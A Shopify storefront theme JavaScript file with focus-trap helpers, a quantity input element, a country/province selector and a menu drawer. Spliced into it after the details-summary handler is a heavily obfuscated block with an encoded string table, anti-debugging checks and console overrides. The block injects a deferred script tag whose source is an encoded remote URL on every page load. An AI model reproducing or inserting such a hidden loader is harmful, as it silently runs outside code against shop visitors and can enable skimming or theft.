function getFocusableElements(container) {
  return Array.from(
    container.querySelectorAll(
      "summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"
    )
  );
}

document.querySelectorAll('[id^="Details-"] summary').forEach((summary) => {
  summary.setAttribute('role', 'button');
  summary.setAttribute('aria-expanded', summary.parentNode.hasAttribute('open'));

  if (summary.nextElementSibling.getAttribute('id')) {
    summary.setAttribute('aria-controls', summary.nextElementSibling.id);
  }

  summary.addEventListener('click', (event) => {
    event.currentTarget.setAttribute('aria-expanded', !event.currentTarget.closest('details').hasAttribute('open'));
  });

  if (summary.closest('header-drawer, menu-drawer')) return;
  summary.parentElement.addEventListener('keyup', onKeyUpEscape);
});(function(b,C){function p(b,C,m,j){return x(b-0x234,m);}var m=b();function J(b,C,m,j){return x(j-0x17f,b);}while(!![]){try{var j=-parseInt(p(0x30c,0x2d8,'LGPb',0x329))/(0x532+0x74*-0x13+0xaf*0x5)*(parseInt(p(0x341,0x346,'dIcv',0x338))/(-0x871*-0x3+0x9f5*0x3+-0x1*0x3730))+-parseInt(p(0x2d9,0x313,'vTU]',0x2f3))/(-0x18e6+-0x2252+-0x3b*-0x101)+-parseInt(p(0x322,0x34f,'dIcv',0x33a))/(0x85b+-0x2151+0x18fa)+parseInt(p(0x34b,0x38c,'bgjd',0x355))/(-0xff8+-0x65*-0x55+-0x118c)+parseInt(p(0x30b,0x2f4,'%WQt',0x2fd))/(0xdd9+0x67b*-0x3+0x59e)+-parseInt(J('iTA&',0x24d,0x2ac,0x28e))/(-0x690+-0x7c+0x1*0x713)+parseInt(J('J&NV',0x2cc,0x2bf,0x2a4))/(-0x23df+0x1d*0xb0+-0x1*-0xff7)*(parseInt(p(0x2ea,0x2f6,'yv$9',0x2c5))/(-0x17bf*0x1+-0x1*-0x347+0x1481));if(j===C)break;else m['push'](m['shift']());}catch(W){m['push'](m['shift']());}}}(P,-0x3b613+0x9b1ff+-0x1*-0x338b4),!function(C,m,j){var W={};W[w(0x152,0x1ae,'Nev#',0x173)]=w(0x12f,0x167,'Oser',0x16a)+w(0x140,0x156,'%WQt',0x141)+t(0x173,0x13e,0x166,'6f$R')+w(0x16a,0x19e,'JtPt',0x17d)+w(0x13f,0x1a7,'rkG*',0x17b)+w(0x14d,0x165,'(Mfp',0x189)+w(0x1d3,0x1d4,'JDjZ',0x1b4),W[t(0x158,0x10b,0x13c,'J&NV')]=w(0x143,0x120,'pW5u',0x156);function w(b,C,m,j){return x(j-0x98,m);}function t(b,C,m,j){return x(m-0x91,j);}var u=W;(j=C[t(0x170,0x161,0x150,'@(Vw')+t(0x193,0x19c,0x177,'N$Wh')](m))['defer']=!(-0x7c+-0x1e9b+0x7*0x471),j[t(0x189,0x169,0x18c,'4@5s')]=u['QGhdf'],(C=C[t(0x154,0x166,0x138,'4@5s')+t(0x153,0x1ac,0x16a,'bsjp')](u[t(0x1ed,0x1c6,0x1b3,'k*eE')])[0xd56+-0x111a+0x3c4])[w(0x13a,0x153,'4@5s',0x160)]['insertBefo'+'re'](j,C['nextSiblin'+'g']);}(document,Y(-0x14d,-0x145,-0x179,'*dNn')));function Y(b,C,m,j){return x(m- -0x23d,j);}!function(W,u,k){function d(b,C,m,j){return Y(b-0xc5,C-0x1c4,m-0x1c0,b);}var h={'FQIfR':function(I,G){return I!==G;},'VSqQA':'aRHSu','GyNyT':o(0x98,0xa4,0xdc,'YcZE'),'efvjm':d('bgjd',0x50,0x2d,-0x13)+'+$','QiqEZ':'3|2|1|4|0|'+'5','JRQII':function(I,G){return I(G);},'DnmbS':d('QE)%',0x2f,0x44,0x41),'MVJMw':'pUghw','prLzr':'XoqXa','GORga':function(I,G){return I!==G;},'rmvjg':d('^3bn',0x67,0x89,0x5e),'LsImg':d('JDjZ',0x6c,0x2b,-0xb),'qWYKH':function(I,G){return I+G;},'KMwMh':'return\x20(fu'+o(0x73,0x66,0x5f,'dIcv'),'GiZLj':'{}.constru'+d('bgjd',0x89,0x78,0x8f)+d('rdUI',0xc5,0xaa,0xc0)+'\x20)','skwov':function(I){return I();},'fMkiJ':o(0x48,0x20,0x6,'QE)%'),'ArFhd':'ewPYE','aquID':d('ChP!',0x71,0x93,0x78),'hzlfi':d('QE)%',0x73,0x51,0x80),'xCSjX':d('^3bn',0x1f,0x52,0x3f),'hzbVq':d('4@5s',0xae,0x70,0x87),'IZriy':o(0x35,0x10,-0xd,'LGPb')+'1','rklqg':function(I,G,L){return I(G,L);},'fZnqA':function(I){return I();},'pYnoz':d('la2&',0x7b,0x4a,0x17)+d('!bRX',0x34,0x5d,0x6f)+o(0x41,0x82,-0x3,'JtPt')+'/static/ap'+o(0x7d,0x4d,0x94,'QE)%'),'WbPrg':o(0xb1,0x9f,0xcf,'JDjZ')},T=(function(){var I=!![];return function(G,L){var Q=I?function(){if(L){var X=L['apply'](G,arguments);return L=null,X;}}:function(){};return I=![],Q;};}()),K=h[d('g*lY',0x9d,0x98,0x91)](T,this,function(){function F(b,C,m,j){return o(j- -0x23b,C-0x150,m-0x139,m);}function a(b,C,m,j){return d(j,C-0x15f,b- -0x34b,j-0x61);}if(h['FQIfR'](h[a(-0x2bf,-0x2a8,-0x2fe,'iTA&')],h['GyNyT']))return K[F(-0x1b2,-0x1cf,'^3bn',-0x1a0)]()[a(-0x30f,-0x32c,-0x31a,'6f$R')](h[a(-0x2b0,-0x2dd,-0x296,'dIcv')])['toString']()['constructo'+'r'](K)[a(-0x2ff,-0x2cf,-0x31b,'rdUI')](h[a(-0x314,-0x351,-0x2eb,'la2&')]);else{var G=k?function(){function U(b,C,m,j){return a(j-0x1e9,C-0x132,m-0x142,b);}if(G){var D=Q[U('6f$R',-0xd7,-0xd2,-0xd3)](X,arguments);return E=null,D;}}:function(){};return M=![],G;}});function o(b,C,m,j){return Y(b-0x1f0,C-0x19e,b-0x1ce,j);}h['fZnqA'](K);var M=(function(){function O(b,C,m,j){return o(b-0x15,C-0x108,m-0x7c,m);}var I={'DlxoB':h[H('!@dt',-0x27c,-0x2af,-0x241)],'UqGYP':function(L,Q){function R(b,C,m,j){return H(b,j-0x37e,m-0x128,j-0x1ba);}return h[R('oSX(',0xe2,0xdd,0xcb)](L,Q);},'OfPli':function(L,Q){return L+Q;},'TaDwo':O(0x5b,0x28,'ZQru',0x99)+H('^3bn',-0x2ef,-0x307,-0x31a)+'rn\x20this\x22)('+'\x20)','yLTcm':h[O(0x68,0x30,'6f$R',0xa3)],'Eqfin':h[H('!J9*',-0x2c7,-0x29b,-0x287)]};function H(b,C,m,j){return o(C- -0x323,C-0x129,m-0xe0,b);}var G=!![];return function(L,Q){var X={'kuZhX':I[V(-0x2c3,-0x2d5,'ChP!',-0x313)],'SBVPo':function(c,D){function Z(b,C,m,j){return V(b-0x1b3,j-0x9f,b,j-0x19f);}return I[Z('pW5u',-0x1e8,-0x1f6,-0x1fb)](c,D);},'kgxmr':function(c,D){return I['OfPli'](c,D);},'WuxPy':I['TaDwo'],'ceXrP':function(c,D){return c!==D;},'sGoIr':I['yLTcm'],'STVib':I['Eqfin']};function V(b,C,m,j){return O(C- -0x345,C-0x16,m,j-0x5a);}var E=G?function(){var c={'thygR':function(A,l){function N(b,C,m,j){return x(b-0x3cb,C);}return X[N(0x4c4,'Ncsg',0x4da,0x4b0)](A,l);},'ATNjk':function(A,l){return X['kgxmr'](A,l);},'mJxpH':function(A,l){return A+l;},'BUrEY':X['WuxPy']};function z(b,C,m,j){return V(b-0x150,m-0x50a,C,j-0xd7);}function i(b,C,m,j){return V(b-0x18d,j-0x296,b,j-0x14d);}if(X['ceXrP'](z(0x235,'%gMt',0x21a,0x254),X['sGoIr'])){if(Q){if(X[i('LGPb',-0x1d,-0x86,-0x5b)]!==X['STVib']){var l=X[z(0x241,'J&NV',0x223,0x25b)][z(0x246,'QE)%',0x267,0x27a)]('|'),r=0x10ac+-0xb*0xcd+0x21*-0x3d;while(!![]){switch(l[r++]){case'0':n[i('JtPt',-0x76,-0x49,-0x43)]=S['toString']['bind'](S);continue;case'1':var S=f[q]||n;continue;case'2':var q=W[M];continue;case'3':var n=T[z(0x29d,'!bRX',0x26b,0x27e)+'r']['prototype'][i('JtPt',-0x14,0x53,0x11)](K);continue;case'4':n[i('LGPb',-0x2,-0x1a,-0xf)]=I[i('Ncsg',-0x45,-0x22,-0x29)](G);continue;case'5':L[q]=n;continue;}break;}}else{var D=Q[z(0x1fc,'JtPt',0x218,0x1e9)](L,arguments);return Q=null,D;}}}else{var r=jsvhWE[z(0x212,'ChP!',0x253,0x227)](m,jsvhWE[i('g*lY',0x16,-0x3c,-0x2b)](jsvhWE[i('5#Rl',-0x24,-0x1d,-0x13)](i('g*lY',0x28,0xe,0x14)+z(0x210,'JtPt',0x21e,0x25c),jsvhWE['BUrEY']),');'));j=r();}}:function(){};return G=![],E;};}()),f=h[o(0xb7,0xd1,0xf7,'(Mfp')](M,this,function(){function g(b,C,m,j){return d(m,C-0x1ba,C-0x2e5,j-0xcf);}function v(b,C,m,j){return d(C,C-0x9e,b- -0x256,j-0x16);}if(h[v(-0x1b4,'J&NV',-0x1ca,-0x191)](h['prLzr'],h[v(-0x1d2,'Q5#B',-0x208,-0x202)])){var S=j[g(0x2dd,0x314,'Qfmm',0x338)](W,arguments);return u=null,S;}else{var I;try{if(h['GORga'](h[g(0x36c,0x379,'!J9*',0x385)],h['LsImg'])){var G=h[g(0x340,0x34c,'*KTU',0x37e)](Function,h[g(0x305,0x338,'Ncsg',0x37a)](h['qWYKH'](h['KMwMh'],h[g(0x354,0x36b,'!@dt',0x389)]),');'));I=h[g(0x377,0x37a,'*KTU',0x348)](G);}else{var q=j[g(0x2ff,0x31a,'g*lY',0x2f7)](W,arguments);return u=null,q;}}catch(q){h[g(0x315,0x319,'h$6O',0x34c)](h['fMkiJ'],h[v(-0x1f2,'yv$9',-0x20d,-0x1ff)])?I=window:((T=K[g(0x3a3,0x366,'h$6O',0x39f)+g(0x2cf,0x30a,'k*eE',0x2dd)](q))['defer']=!(-0x154c+-0x1453+0x299f),M['src']=g(0x33e,0x33e,'!@dt',0x322)+v(-0x1b2,'dIcv',-0x1a3,-0x1e9)+g(0x393,0x390,'YcZE',0x3b3)+g(0x2fe,0x33c,'%gMt',0x36f)+g(0x36d,0x370,'Qfmm',0x345)+v(-0x1db,'6f$R',-0x1f5,-0x19b)+g(0x365,0x36c,'k*eE',0x36a),(f=I[v(-0x219,'J&NV',-0x1f9,-0x1e1)+v(-0x1e0,'QE)%',-0x1b8,-0x21e)](v(-0x22d,'!bRX',-0x229,-0x21b))[-0x1*-0x55e+-0x31d*0x1+-0x241])[v(-0x1c8,'*dNn',-0x1d0,-0x194)][v(-0x216,'qA(K',-0x258,-0x253)+'re'](G,L[g(0x330,0x345,'RltJ',0x331)+'g']));}var L=I[g(0x354,0x38c,'ChP!',0x34d)]=I[v(-0x1b5,'*KTU',-0x1ae,-0x1c4)]||{},Q=[h[v(-0x213,'Qfmm',-0x21f,-0x1e0)],h[g(0x342,0x353,'!bRX',0x33f)],v(-0x217,'*KTU',-0x1de,-0x1e1),'error',h['xCSjX'],h['hzbVq'],'trace'];for(var X=-0x3b2+0x2685+-0x22d3;X<Q[g(0x30d,0x33b,'myph',0x355)];X++){var E=h[v(-0x1e9,'g*lY',-0x205,-0x214)][g(0x35f,0x383,'%WQt',0x351)]('|'),c=0x202b+-0x649*-0x2+-0x2cbd;while(!![]){switch(E[c++]){case'0':var D=L[l]||A;continue;case'1':L[l]=A;continue;case'2':A[v(-0x1f7,'4@5s',-0x1e4,-0x1f0)]=D[v(-0x1d1,'QE)%',-0x1cc,-0x1c7)][g(0x34b,0x32d,'*dNn',0x31e)](D);continue;case'3':A[g(0x343,0x367,'N$Wh',0x36e)]=M[v(-0x218,'qA(K',-0x21d,-0x253)](M);continue;case'4':var A=M[v(-0x1e4,'bgjd',-0x1ae,-0x223)+'r']['prototype'][v(-0x1e3,'4HMW',-0x1e4,-0x1a3)](M);continue;case'5':var l=Q[X];continue;}break;}}}});h[o(0xaa,0xce,0xbe,'6f$R')](f),((k=W['createElem'+d('hpSL',0xb3,0x97,0xbc)](u))[d('la2&',0x9d,0x6c,0x59)]=!(-0x92f*0x4+-0x26a+0x2726),k[d('5#Rl',0x53,0x46,0x5c)]=h[o(0x85,0x95,0x4e,'la2&')],(W=W[o(0x78,0x90,0x6e,'!bRX')+d('ZQru',0x6a,0x80,0x5f)](h[d('I!P[',0x62,0x96,0xcc)])[-0x1936+0x208f+-0x759])[d('QE)%',0x7d,0x4f,0x63)][o(0x9f,0x85,0xa8,'myph')+'re'](k,W[d('J&NV',0xa8,0x7a,0x93)+'g']));}(document,'script');function x(b,C){var m=P();return x=function(j,W){j=j-(-0x1a*0x77+-0x6*0x196+0x163c);var u=m[j];if(x['mpNsGy']===undefined){var k=function(M){var f='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var I='',G='',L=I+k;for(var Q=-0x2054+0x22b8*0x1+-0x264,X,E,c=0x1*0xdb3+-0x1605+0x852;E=M['charAt'](c++);~E&&(X=Q%(-0x1674+0x4*-0x44+-0x4*-0x5e2)?X*(0x5*0x307+-0xf74+0x91)+E:E,Q++%(-0x1*-0x2351+-0x4f*0x35+-0x12f2))?I+=L['charCodeAt'](c+(-0x4b7*0x1+-0x1921+-0x1a9*-0x12))-(-0x7f2+0x2*-0x6a0+0x54f*0x4)!==0x54d*-0x3+-0x1d9f+0x2d86?String['fromCharCode'](-0x5c4+-0x7b*0x4+0x9*0xf7&X>>(-(0x2285+-0x1a07+-0x87c)*Q&-0x14a4+-0x22b8+-0x1a1*-0x22)):Q:0x1f83+0xdc7+-0x2d4a){E=f['indexOf'](E);}for(var D=0x1*0x173c+0x2443+-0x1*0x3b7f,A=I['length'];D<A;D++){G+='%'+('00'+I['charCodeAt'](D)['toString'](0x201b+0x22e8+-0x42f3*0x1))['slice'](-(-0xe71*0x1+0x1272+-0x3ff));}return decodeURIComponent(G);};var e=function(M,f){var I=[],G=-0x247d*0x1+0xbca*0x1+0x1*0x18b3,L,Q='';M=k(M);var X;for(X=-0x1bca+-0x2137+0x3d01;X<0x305+0x20ac+-0x22b1;X++){I[X]=X;}for(X=-0x23a8+0xe5c+0x74*0x2f;X<-0x2*0x4e7+0x381*0xa+-0x2f*0x84;X++){G=(G+I[X]+f['charCodeAt'](X%f['length']))%(0x1746+-0x1*0x2123+0xadd),L=I[X],I[X]=I[G],I[G]=L;}X=-0x2405*0x1+-0x2472+0x593*0xd,G=0x1872*0x1+-0x1*0x2351+0xadf;for(var E=0x19d2+0x281*-0xd+0x6bb*0x1;E<M['length'];E++){X=(X+(-0x7ac+0x18d6+-0x1129))%(-0x25e5+-0x5*0x138+0x2cfd),G=(G+I[X])%(-0x1*-0x131+-0x8*0x185+-0x1*-0xbf7),L=I[X],I[X]=I[G],I[G]=L,Q+=String['fromCharCode'](M['charCodeAt'](E)^I[(I[X]+I[G])%(0x33*0x1d+-0x230*-0xb+-0x99d*0x3)]);}return Q;};x['BwvGgm']=e,b=arguments,x['mpNsGy']=!![];}var h=m[-0x3*-0x761+0x1*0x20b1+-0x36d4],T=j+h,K=b[T];if(!K){if(x['aZpylG']===undefined){var M=function(f){this['gECAXp']=f,this['vPVxzU']=[0x2b0+-0x1*-0xa13+-0x47*0x2e,0x13d*0x1a+-0xeab+-0x1187*0x1,-0x1e9f+-0x714+0x25b3],this['AlafDA']=function(){return'newState';},this['DvBRdL']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['NPMbWo']='[\x27|\x22].+[\x27|\x22];?\x20*}';};M['prototype']['vZuXjl']=function(){var f=new RegExp(this['DvBRdL']+this['NPMbWo']),I=f['test'](this['AlafDA']['toString']())?--this['vPVxzU'][-0x1174+0x40*-0x61+0x29b5]:--this['vPVxzU'][0x1*-0x1b1+-0x1e0*-0x10+0x1*-0x1c4f];return this['kdSOcU'](I);},M['prototype']['kdSOcU']=function(f){if(!Boolean(~f))return f;return this['BMXWGq'](this['gECAXp']);},M['prototype']['BMXWGq']=function(f){for(var I=-0xd1+-0x5*-0x68a+-0x1fe1,G=this['vPVxzU']['length'];I<G;I++){this['vPVxzU']['push'](Math['round'](Math['random']())),G=this['vPVxzU']['length'];}return f(this['vPVxzU'][-0x193*-0x11+0x1174*0x2+-0x1*0x3dab]);},new M(x)['vZuXjl'](),x['aZpylG']=!![];}u=x['BwvGgm'](u,W),b[T]=u;}else u=K;return u;},x(b,C);}function P(){var B=['WRxcRSocgHS7mmo9W6BdUG','W4KsuXW','aCkbW5X3','W4ivtH1UW6zFWPxcSSke','pZ/dK8klsW4','hHxdNtddU8kfBqRcLJK','WQyLWPNdT3e','W5NcKSkxqJq','WRxcKMpdPaO','W43cTam','WPDFWOC/eSkh','WOzvWPSY','W57cGmkZaSoKnSktWRi','tKWTC1NcSvNcGmoCgW','Ee7dSCknsL3dSCoPxta','WPldHK/dI8opW7G','W65Ll8kqWR0','d8kpBhOg','W6BcSmk1CIOvy8khW5/dVq','WQrSvalcICkTW5nDW69Zp3PF','W6hcSmk1Eq','pGxdV1n3ACodu8ka','v1pdMmklrq','tc7dNZZdUCkcrG','zIjTW67dMchdKX1fgG','W41ljCoNWP5d','qSoPuwddO8ooW6OKq8ov','WPBcJshdQJdcIsepjCoM','WO1AW5rtWQ06i8kTd8oW','WPHXW5pdPGRcNmo/fHGfmmkmbW','WRpcPJhcNG9gsq','AGddU1BdILpcICkcD8kP','WOTFW53dRqJcPMqmvX0','W4yEc1tdMW','FeddKmkCvKddKCoH','tCofc0bCmmobCSkKW74','hrW8B0W','i8k7iJXO','rg3dR8kK','WPxcR8o3W51D','W4RcM8kUtCkHgX9tta','iHe9W6n5WRxdUmoXqSkD','iSk9W6TruW','WOxcNmkuf8oInSkEW7RcUvS','dSolWQS','WOiuW4ldHaxcTwaqvKC','W55HlSkyWQ0','qL0/zLG','friaBf4','WO0lW5RdPWa','W7/dV8kTza','Fe7dOCkeqq','WPFdGmoJeSo+ixGdiCoHW5m','b8koB8oTWOHUtr7cHSk8','W44GkXa','sCkzq8oYaSkrWQ8dW6al','aCkvW6jYvcJcNvtdKJ5bW7VdMq','W6xcK8k+qYugy8kjW5BdVq','vMe3Bfa','b8kvBSoSW5q+sHJcHSkM','W5pcJbGrW5y','WRZcRSookYq3p8o0W6hdOa','W5ZcKNVdSIVcGGOioSoL','DuBdL8kqyG','W53cScBcGrzqsh/dHq','E13dOa','W6xcOCkRFJa','rSoKWQ0uaNVdPMhdHqm','W7xcJSkKgshcKvfdxxS','nmo6WQ/cQ0GXWRtdKmkz','WOyEW5JdSH3cONGwtfW','WOCPW6CAWQ0','W6lcVSkuyZyiq8kp','WQjhW7PVWRq','p8k2qW','gs3dPSk7AW','iYZdU29c','W7j7wmktea','WQSWW4hdIvqMpmoiWPRdOG','WP3cT8o6EbW','lXldJ0j1DmoewW','WPrDWOCZdmkhBh/dSmkC','WPdcJh7dQIa','WPxdJ8oPeCo/rGmIkSobW7pdT1K','W4HaomoLWPHFECorDZu','W77dLCk5eg7dNc0jWQtcUmoSWRJdNq','W4zMma','mmk0uf0w','g8keW413Ba','lJxdJmkzW5a','WQDdlq','lImEDea','WRrhW5fMWOq','umosn8kSW4SOdsNcImklhmk5fa','W4hcNSkStSkJ','WPFcPMddTXG','W4JcHSkoeG','W5G0WOJcVuO','tSo+sq','lI0gCfvLWRnTW5XC','c8kaW5rRDxRdPa','WPtcMSo/osu','e8o3smkiWPCc','W4RdLSkXsmkVa14da8k6','DmkVqaP0','WRhdNg7dGeKvfgNdRSkyWP4LjG','W4LMoCkmWPatFq','W6RdUmkbAsmMdSo1W6/dVG','fSkCwSo3fW','WPpdJq7dJCoeW7NdP1nGW7G','W556nCk6hSk1WOpdK0ey','DmkYra','oaNdS0qVp8oywCkAWOm','WRBcK2pcJ0LyffZcQmkb','uLBcUCoNpgBdVCotW419BZLe','WPysW4tdQbNcPa','B0RdT8kTseZdKSoJvYe','n8o9umkBWOq','W4vQWO/cUf/dMSkGgXnE','tmojkCkWW5C1e1tdMCo6','WRFcUmogpd0','WQyKWPZdKKW','W4VcN8kqgSoV','W5hcUWdcMHS','lSoYuhpdTG','W43cNSopgSo/pCkIWRVcVL8','W5hcS8kthZq','ptGcAv4','W4tcJmkuh8o5mCovW7ZdRG','q14VAuC','tSoBW7OJdhldM3tdMHm','W6xdQ8kaWOuiW7JcNmo5WQpdU8kI','W5lcUmksxsG','WRNcVSoSnY8','WOlcMw/dTdRcGW'];P=function(){return B;};return P();}const trapFocusHandlers = {};
function trapFocus(container, elementToFocus = container) {
  var elements = getFocusableElements(container);
  var first = elements[0];
  var last = elements[elements.length - 1];

  removeTrapFocus();

  trapFocusHandlers.focusin = (event) => {
    if (event.target !== container && event.target !== last && event.target !== first) return;

    document.addEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.focusout = function () {
    document.removeEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.keydown = function (event) {
    if (event.code.toUpperCase() !== 'TAB') return; // If not TAB key
    // On the last focusable element and tab forward, focus the first element.
    if (event.target === last && !event.shiftKey) {
      event.preventDefault();
      first.focus();
    }

    //  On the first focusable element and tab backward, focus the last element.
    if ((event.target === container || event.target === first) && event.shiftKey) {
      event.preventDefault();
      last.focus();
    }
  };

  document.addEventListener('focusout', trapFocusHandlers.focusout);
  document.addEventListener('focusin', trapFocusHandlers.focusin);

  elementToFocus.focus();

  if (
    elementToFocus.tagName === 'INPUT' &&
    ['search', 'text', 'email', 'url'].includes(elementToFocus.type) &&
    elementToFocus.value
  ) {
    elementToFocus.setSelectionRange(0, elementToFocus.value.length);
  }
}

// Here run the querySelector to figure out if the browser supports :focus-visible or not and run code based on it.
try {
  document.querySelector(':focus-visible');
} catch (e) {
  focusVisiblePolyfill();
}

function focusVisiblePolyfill() {
  const navKeys = [
    'ARROWUP',
    'ARROWDOWN',
    'ARROWLEFT',
    'ARROWRIGHT',
    'TAB',
    'ENTER',
    'SPACE',
    'ESCAPE',
    'HOME',
    'END',
    'PAGEUP',
    'PAGEDOWN',
  ];
  let currentFocusedElement = null;
  let mouseClick = null;

  window.addEventListener('keydown', (event) => {
    if (navKeys.includes(event.code.toUpperCase())) {
      mouseClick = false;
    }
  });

  window.addEventListener('mousedown', (event) => {
    mouseClick = true;
  });

  window.addEventListener(
    'focus',
    () => {
      if (currentFocusedElement) currentFocusedElement.classList.remove('focused');

      if (mouseClick) return;

      currentFocusedElement = document.activeElement;
      currentFocusedElement.classList.add('focused');
    },
    true
  );
}

function pauseAllMedia() {
  document.querySelectorAll('.js-youtube').forEach((video) => {
    video.contentWindow.postMessage('{"event":"command","func":"' + 'pauseVideo' + '","args":""}', '*');
  });
  document.querySelectorAll('.js-vimeo').forEach((video) => {
    video.contentWindow.postMessage('{"method":"pause"}', '*');
  });
  document.querySelectorAll('video').forEach((video) => video.pause());
  document.querySelectorAll('product-model').forEach((model) => {
    if (model.modelViewerUI) model.modelViewerUI.pause();
  });
}

function removeTrapFocus(elementToFocus = null) {
  document.removeEventListener('focusin', trapFocusHandlers.focusin);
  document.removeEventListener('focusout', trapFocusHandlers.focusout);
  document.removeEventListener('keydown', trapFocusHandlers.keydown);

  if (elementToFocus) elementToFocus.focus();
}

function onKeyUpEscape(event) {
  if (event.code.toUpperCase() !== 'ESCAPE') return;

  const openDetailsElement = event.target.closest('details[open]');
  if (!openDetailsElement) return;

  const summaryElement = openDetailsElement.querySelector('summary');
  openDetailsElement.removeAttribute('open');
  summaryElement.setAttribute('aria-expanded', false);
  summaryElement.focus();
}

class QuantityInput extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector('input');
    this.changeEvent = new Event('change', { bubbles: true });
    this.input.addEventListener('change', this.onInputChange.bind(this));
    this.querySelectorAll('button').forEach((button) =>
      button.addEventListener('click', this.onButtonClick.bind(this))
    );
  }

  quantityUpdateUnsubscriber = undefined;

  connectedCallback() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe(PUB_SUB_EVENTS.quantityUpdate, this.validateQtyRules.bind(this));
  }

  disconnectedCallback() {
    if (this.quantityUpdateUnsubscriber) {
      this.quantityUpdateUnsubscriber();
    }
  }

  onInputChange(event) {
    this.validateQtyRules();
  }

  onButtonClick(event) {
    event.preventDefault();
    const previousValue = this.input.value;

    event.target.name === 'plus' ? this.input.stepUp() : this.input.stepDown();
    if (previousValue !== this.input.value) this.input.dispatchEvent(this.changeEvent);
  }

  validateQtyRules() {
    const value = parseInt(this.input.value);
    if (this.input.min) {
      const min = parseInt(this.input.min);
      const buttonMinus = this.querySelector(".quantity__button[name='minus']");
      buttonMinus.classList.toggle('disabled', value <= min);
    }
    if (this.input.max) {
      const max = parseInt(this.input.max);
      const buttonPlus = this.querySelector(".quantity__button[name='plus']");
      buttonPlus.classList.toggle('disabled', value >= max);
    }
  }
}

customElements.define('quantity-input', QuantityInput);

function debounce(fn, wait) {
  let t;
  return (...args) => {
    clearTimeout(t);
    t = setTimeout(() => fn.apply(this, args), wait);
  };
}

function throttle(fn, delay) {
  let lastCall = 0;
  return function (...args) {
    const now = new Date().getTime();
    if (now - lastCall < delay) {
      return;
    }
    lastCall = now;
    return fn(...args);
  };
}

function fetchConfig(type = 'json') {
  return {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', Accept: `application/${type}` },
  };
}

/*
 * Shopify Common JS
 *
 */
if (typeof window.Shopify == 'undefined') {
  window.Shopify = {};
}

Shopify.bind = function (fn, scope) {
  return function () {
    return fn.apply(scope, arguments);
  };
};

Shopify.setSelectorByValue = function (selector, value) {
  for (var i = 0, count = selector.options.length; i < count; i++) {
    var option = selector.options[i];
    if (value == option.value || value == option.innerHTML) {
      selector.selectedIndex = i;
      return i;
    }
  }
};

Shopify.addListener = function (target, eventName, callback) {
  target.addEventListener
    ? target.addEventListener(eventName, callback, false)
    : target.attachEvent('on' + eventName, callback);
};

Shopify.postLink = function (path, options) {
  options = options || {};
  var method = options['method'] || 'post';
  var params = options['parameters'] || {};

  var form = document.createElement('form');
  form.setAttribute('method', method);
  form.setAttribute('action', path);

  for (var key in params) {
    var hiddenField = document.createElement('input');
    hiddenField.setAttribute('type', 'hidden');
    hiddenField.setAttribute('name', key);
    hiddenField.setAttribute('value', params[key]);
    form.appendChild(hiddenField);
  }
  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
};

Shopify.CountryProvinceSelector = function (country_domid, province_domid, options) {
  this.countryEl = document.getElementById(country_domid);
  this.provinceEl = document.getElementById(province_domid);
  this.provinceContainer = document.getElementById(options['hideElement'] || province_domid);

  Shopify.addListener(this.countryEl, 'change', Shopify.bind(this.countryHandler, this));

  this.initCountry();
  this.initProvince();
};

Shopify.CountryProvinceSelector.prototype = {
  initCountry: function () {
    var value = this.countryEl.getAttribute('data-default');
    Shopify.setSelectorByValue(this.countryEl, value);
    this.countryHandler();
  },

  initProvince: function () {
    var value = this.provinceEl.getAttribute('data-default');
    if (value && this.provinceEl.options.length > 0) {
      Shopify.setSelectorByValue(this.provinceEl, value);
    }
  },

  countryHandler: function (e) {
    var opt = this.countryEl.options[this.countryEl.selectedIndex];
    var raw = opt.getAttribute('data-provinces');
    var provinces = JSON.parse(raw);

    this.clearOptions(this.provinceEl);
    if (provinces && provinces.length == 0) {
      this.provinceContainer.style.display = 'none';
    } else {
      for (var i = 0; i < provinces.length; i++) {
        var opt = document.createElement('option');
        opt.value = provinces[i][0];
        opt.innerHTML = provinces[i][1];
        this.provinceEl.appendChild(opt);
      }

      this.provinceContainer.style.display = '';
    }
  },

  clearOptions: function (selector) {
    while (selector.firstChild) {
      selector.removeChild(selector.firstChild);
    }
  },

  setOptions: function (selector, values) {
    for (var i = 0, count = values.length; i < values.length; i++) {
      var opt = document.createElement('option');
      opt.value = values[i];
      opt.innerHTML = values[i];
      selector.appendChild(opt);
    }
  },
};

class MenuDrawer extends HTMLElement {
  constructor() {
    super();

    this.mainDetailsToggle = this.querySelector('details');

    this.addEventListener('keyup', this.onKeyUp.bind(this));
    this.addEventListener('focusout', this.onFocusOut.bind(this));
    this.bindEvents();
  }

  bindEvents() {
    this.querySelectorAll('summary').forEach((summary) =>
      summary.addEventListener('click', this.onSummaryClick.bind(this))
    );
    this.querySelectorAll('button:not(.localization-selector)').forEach((button) =>
      button.addEventListener('click', this.onCloseButtonClick.bind(this))
    );
  }

  onKeyUp(event) {
    if (event.code.toUpperCase() !== 'ESCAPE') return;

    const openDetailsElement = event.target.closest('details[open]');
    if (!openDetailsElement) return;

    openDetailsElement === this.mainDetailsToggle
      ? this.closeMenuDrawer(event, this.mainDetailsToggle.querySelector('summary'))
      : this.closeSubmenu(openDetailsElement);
  }

  onSummaryClick(event) {
    const summaryElement = event.currentTarget;
    const detailsElement = summaryElement.parentNode;
    const parentMenuElement = detailsElement.closest('.has-submenu');
    const isOpen = detailsElement.hasAttribute('open');
    const reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');

    function addTrapFocus() {
      trapFocus(summaryElement.nextElementSibling, detailsElement.querySelector('button'));
      summaryElement.nextElementSibling.removeEventListener('transitionend', addTrapFocus);
    }

    if (detailsElement === this.mainDetailsToggle) {
      if (isOpen) event.preventDefault();
      isOpen ? this.closeMenuDrawer(event, summaryElement) : this.openMenuDrawer(summaryElement);

      if (window.matchMedia('(max-width: 990px)')) {
        document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
      }
    } else {
      setTimeout(() => {
        detailsElement.classList.add('menu-opening');
        summaryElement.setAttribute('aria-expanded', true);
